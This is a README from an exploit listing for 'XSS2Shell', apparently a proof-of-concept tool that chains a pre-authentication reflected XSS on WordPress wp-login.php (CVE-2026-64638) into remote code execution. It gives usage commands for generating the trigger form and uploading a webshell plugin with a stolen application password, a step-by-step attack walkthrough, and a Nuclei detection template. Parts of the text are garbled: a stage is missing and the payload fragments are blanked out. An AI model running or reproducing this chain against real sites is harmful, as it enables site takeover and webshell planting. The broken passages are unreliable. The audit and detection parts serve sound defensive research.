## https://sploitus.com/exploit?id=99636C1B-A541-5B1F-84F5-5EC82A80FDEE
# XSS2Shell — WordPress Pre-Auth XSS → RCE Chain PoC
**CVE-2026-64638** · Reflected XSS on `wp-login.php` · CVSS 8.9 (v4.0) · Patched in WordPress 7.0.3
> ⚠️ **AUTHORIZED TESTING ONLY.** This tool is for security research and
> authorized penetration testing against systems you own or have explicit
> written permission to test. Unauthorized use is illegal in most
> jurisdictions. The researcher (PWN.AI) disclosed this on 2026-08-07;
> WordPress shipped the fix in 7.0.3 the same day.
## Overview
XSS2Shell is a pre-authentication **XSS to code-execution chain** affecting
WordPress Core (all versions back to 4.7, ~500M+ sites). A single crafted
failed-login attempt runs attacker JavaScript in the WordPress origin; against
a logged-in administrator it escalates to **full RCE**.
Public disclosure:
## The Chain (5 stages)
1. **Parser differential** — `wp-login.php` reflects the submitted username
via `sprintf('Error: The username %s ...')`.
`` (whitespace between ``, ``,
`X`.
3. **Autonomous request** — `wp-pass.php`'s delegated click handler fires via
the injected button. The guard `user_id === new_user_id` is bypassed
(`undefined === undefined` — both inputs absent on the login page). The
identifier `ajaxurl` resolves to the injected `` via HTML named
property access on the Window object.
4. **Same-origin POST** — jQuery POSTs to the attacker-controlled `href`
(`/?rest_route=/&_method=GET&_jsonp=alert&_envelope=1` — JSONP envelope).
5. **RCE (admin victim)** — OAuth app-password flow → REST API page creation →
plugin upload → webshell (PHP in `wp-content/plugins//` is
web-accessible without activation).
## Usage
```bash
# 1. Non-destructive check — does the target reflect the payload?
python3 xss2shell.py check https://example.com
# 2. 🛡️ DEFENSIVE AUDIT — WordPress hardening report (A-F score)
python3 xss2shell.py audit https://example.com
# Checks: core version vs XSS2Shell/wp2shell, XSS reflection,
# sensitive file exposure (wp-config.bak, .git, debug.log, xmlrpc),
# security headers (CSP/HSTS/XFO), REST user enumeration.
# 3. Generate the trigger HTML form (XSS stage)
python3 xss2shell.py exploit --target example.com > trigger.html
# 4. RCE stage (lab only — needs admin application password)
python3 xss2shell.py shell https://example.com --app-password "XXXX XXXX XXXX XXXX XXXX XXXX"
# 5. Emit the plugin zip without uploading
python3 xss2shell.py zip --out xss2shell-plugin.zip
```
Requires: **Python 3.8+ stdlib only** — no third-party dependencies.
### Audit example
```
$ python3 xss2shell.py audit https://target.example
🛡️ WORDPRESS GÜVENLİK DENETİMİ (savunma modu)
🔴 [CRITICAL] WordPress 6.9.4 — CVE-2026-64638 (XSS2Shell) SAVUNMASIZ, 7.0.3+ gerekli
🔴 [CRITICAL] wp-login.php XSS yansıması VAR — CVE-2026-64638 aktif, acil güncelle!
🟠[HIGH] Sızıntı: /xmlrpc.php HTTP 405
🟡 [WARN] Header X-Frame-Options eksik — clickjacking koruması önerilir
...
📊 GÜVENLİK SKORU: F (91 puan risk) — Ciddi risk — hemen önlem al!
```
## Attack flow (manual lab walkthrough)
1. Serve `trigger.html`, submit it (or auto-submit via JS) against the target
login page → XSS fires in the victim's browser.
2. With an admin victim: `authorize-application.php` is abused to mint an
application password.
3. Use the app password with `shell` to upload the plugin zip.
4. Access `/wp-content/plugins/xss2shell/xss2shell.php` — `{"rce":true,...}`.
## Detections / References
- PWN.AI disclosure:
- THN coverage:
- NHS cyber alert:
- SocRadar:
## Nuclei Template
A ready-to-use **Nuclei** template is included: [`nuclei-CVE-2026-64638.yaml`](nuclei-CVE-2026-64638.yaml)
```bash
# Scan a single target
nuclei -t nuclei-CVE-2026-64638.yaml -u https://example.com
# Scan a list of targets
nuclei -t nuclei-CVE-2026-64638.yaml -l targets.txt
```
The template detects the parser differential (reflected ` Note: a functionally identical template was merged upstream into
> [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) via
> PR #16785 — this copy is maintained here for standalone use.
## License
MIT License — see [LICENSE](LICENSE).
> **Note:** This PoC is published for defensive research and educational
> purposes. Use only against systems you own or are authorized to test.